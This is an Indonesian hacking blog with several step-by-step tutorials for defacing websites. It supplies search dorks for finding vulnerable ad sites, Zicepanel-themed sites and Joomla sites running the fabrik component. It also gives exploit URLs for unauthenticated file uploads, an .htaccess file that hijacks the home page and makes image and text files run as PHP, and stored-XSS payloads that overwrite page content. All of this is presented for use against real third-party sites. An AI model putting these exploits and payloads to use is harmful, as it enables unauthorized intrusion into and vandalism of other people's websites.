No Light

Kali ini saya akan membagikan tutorial untuk mendeface website iklan dengan metode XSS. Metode XSS ini boleh disebut dengan metode JSO. Metode ini sangat lah mudah, untuk kode defacenya juga sudah saya siapkan tinggal pakai saja.


Pertama-tama kita cari targetnya terlebih dahulu. Gunakan dork beriku, untuk dork dapat kalian kembangkan sendiri.

intext: "copyright © 2012 PermataIklan.com All Right Reserved"

Buka targetnya, setelah itu klik "Pasang Iklan".


Isi semua data-datanya untuk mengisi alaman website perlu diperhatikan.



Untuk injeksi XSS ke alamat web formatnya seperti ini :

nama.com">kodeXSS

Untuk full kode XSS kalian dapat gunakan dibawah ini :

zero.com"><div style="width:100%;height:100%;text-align:center;font-size:30pt;position:fixed;display:block;top:0;left:0;background:black;color:white;font-family:consolas,monospace;z-index:9999">YOUR WEBSITE HAS BEEN HACKED</div>

Terakhir klik "Pasang". Buka halaman utamanya dan BOOOM!!!. Perlu diperhatikan bahwa kalian tidak bisa terlalu banyak menggunakan Tag HTML, karena tampilannya akan rusak.


Semoga bermanfaat, Happy Hacking. "Deface adalah Seni Hacking".

Halo apa kabar ? di tutorial ini saya akan membagikan sebuah cara untuk mendeface website yang mempunyai tema Zicepanel. Seperti biasa saya tidak akan menjelaskan secara detail. Cara upload file pada tehnik deface ini menggunakan fitur uploadify dari website itu sendiri, dan karena tidak ada filter kita dapat upload file melalui client, hal ini disebut dengan tehnik CSRF.


Oke, langsung saja, pertama-tama kita cari websitenya dengan menggunakan dork :

inurl:/themes/zicepanel/

Untuk dork nya kembangan sendiri, mungkin kalian tambah dengan site, intitle dsb. Setelah kita mendapat targetnya, gunakan exploit berikut untuk mengecek file untuk uploadnya :

Expoit : /themes/zicepanel/components/uploadify/uploadify.php

Sehingga url dari websitenya menjadi seperti ini :

URL : target.com/themes/zicepanel/components/uploadify/uploadify.php

Kalau website tidak menampilkan apapun atau blank berarti website tersebut rentan dan kita dapat upload filenya. Sekarang kita tinggal upload filenya gunakan Uploader dibawah ini :

CSRF ZicePanel File Uploader

Target :


File :

Upload

Disini saya mengupload file HTML, jika muncul seperti dibawah ini berarti upload sudah berhasil.


Setelah itu kalian dapat membuka filenya dengan URL https://www.target.com/namafile yang muncul semisal :

URL : https://www.target.com/L7jeAlgEm2zxpVyX8BnUhubCadtFNks6.html

Jika kita kunjungi hasilnya seperti in :D untuk script deface saya hanya simple seperti ini



Sekian, semoga bermanfaat dan Happy Hacking Brother.

Halo gengs apakabar ? kali ini saya akan membagikan tutorial deface website yang menggunakan CMS Joomla. Trik deface ini memanfaatkan sebuah halaman untuk upload file CSV. File CSV sendiri adalah sebuah dokumen table yang mirip dengan document excel tetapi lebih ringkas dan sederhana. Namun pada saat upload file, tidak hanya file dengan format CSV saja yang dapat di upload melainkan file seperti Image, HTML dan PHP juga dapat di upload.


Seperti biasa disini saya akan menyensor sepenuhnya website-website yang saya tunjukan disini, karena website ini memiliki disclaimer yang mana hanya untuk tujuan pembelajaran saja, untuk targetnya kalian dapat mencarinya dengan dork berikut ini :

inurl:viewTable?cid= site:com
inurl:viewTable?cid= site:ru
inurl:viewTable?cid= site:ac
inurl:viewTable?cid= site:id
inurl:viewTable?cid= site:my
inurl:viewTable?cid= site:co

Jika pencarian website nya cukup susah kalian bisa hilangkan site dan titik ganda setelah inurl.  Website yang menjadi target ciri-ciri URL nya seperti ini :

URL-1 : website-ru.sak/index.php?option=com_fabrik&task=viewTable&cid=9


URL-2 : https://rusakin.aja/component/fabrik/viewTable?cid=


Jika dilihat dari tampilan kedua website diatas dapat dilihat bahwa halaman menampilkan tulisan "Sorry this form..." berarti website tersebut dapat di beri exploit, gunakan exploit dibawah ini :

Exploit : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Setelah di exploit nantinya website akan menampilkan sebuah halaman form Import CSV. Lalu pilih file dan klik tombol upload.


Secara umum file akan berada pada folder media jadi buka file dengan URL seperti ini, jika file tidak ada atau tidak dapat dibuka berarti CMS tersebut sudah di patch atau di tambal celahnya :

URL : alamat-website.com/media/nama-file.html

Happy hacking dan sampai jumpa pada tutorial berikutnya.


Tulis di kolom komentar jika belum ada yang kalian pahami.

Halo sahabat No Light, di tutorial ini saya akan menjelaskan sebuah cara untuk mendeface website yang menggunakan CMS Joomla. Deface dengan cara ini juga dapat mengganti tampilan halaman home dari sebuah website, mungkin lebih banyak dikenal dengan sebutan tebas index, yang mana file yang kita upload ke server adalah file htaccess.


Deface dengan cara ini mungkin sudah tidak banyak website yang bisa karena kebanyakan fitur uploadnya sudah di-disable dan ada yang sudah update CMS nya ke versi yang terbaru. Untuk mencari website yang memakai CMS Joomla gunakan Dork berikut :

inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:com
inurl:index.php?option=com_fabrik&view= site:com
inurl:importcsv.php site:com

Setelah kalian menemukan websitenya, ganti url halaman dengan exploit berikut :

Exploit: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Sehingga URL nya menjadi seperti ini :

https://websiteku.ru.sak/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Jika kalian menemukan halaman seperti dibawah ini atau mungkin blank, berarti websitenya kemungkinan besar dapat di deface.


Siapkan file halaman deface kalian. Setelah itu kalian buat file *.htaccess dengan isi seperti berikut :

DirectoryIndex zero.html
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla

Ganti nama file ( tulisan merah ) dengan file halaman deface kalian sendiri. Upload filenya dengan menggunakan Uploader dibawah ini, masukan target dengan url halaman website + exploitnya seperti ini :

https://websiteku.ru.sak/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

CSRF Com_Fabrik File Uploader

Target :


File :

Upload

Upload file deface terlebih dahulu dan setelah itu upload file htaccess. Jika kalian berhasil upload file, kalian akan menemukan halaman website dengan direktori file kalian, contohnya seperti ini ( saat upload file htaccess ) :

{"filepath":"\/.htaccess","uri":"http:\/\/websiteku.ru.sak\/.htaccess"}

Itu saja untuk tutorial kali ini semoga bermanfaat dan sampai jumpa pada materi berikutnya. Happy Hacking.

Jika kalian sudah mempelajari tentang XSS, di tutorial kali ini saya akan menunjukan salah satu dampak yang dapat ditimbulkan dari serangan XSS yaitu Defacing. Deface yaitu mengubah tampilan dari sebuah website. Di tutorial ini saya akan menguji pada website local.


Di website ada sebuah kolom komentar, yang mana kita dapat memasukan nama dan sebuah komentar.


Untuk stored XSS, kode XSS akan disimpan didalam database. Jadi untuk stored XSS bersifat permanen, tidak seperti reflected XSS yang dapat terjadi jika user mengunjungi link yang ada payload XSS nya.

Jika kita memasukan payload dibawah ini pada kolom komentar kita akan mendapatkan kotak dialog alert. Siapapun yang mengunjungi link tersebut akan melihat sebuah kotak dialog.

Payload : <img src='x' onerror='alert(1)'>

Bagaimana jika payload nya seperti ini :

Payload : <script>document.documentElement.innerHTML = "<body style='background:black;color:white;'><h1>Your Website Has Been Hacked</h1></body>"</script>

*document.documentElement.innerHTML untuk mengubah kode HTML yang ditampilkan di website.

Hasilnya seperti ini, website sudah berhasil di deface dengan metode Stored XSS.


Tehniknya sangat sederhana namun dampaknya sangat besar. Segitu saja untuk tutorial kali ini semoga bermanfaat, silahkan bertanya di kolom komentar jika ada yang kurang dimengerti. Sampai jumpa pada tutorial berikutnya.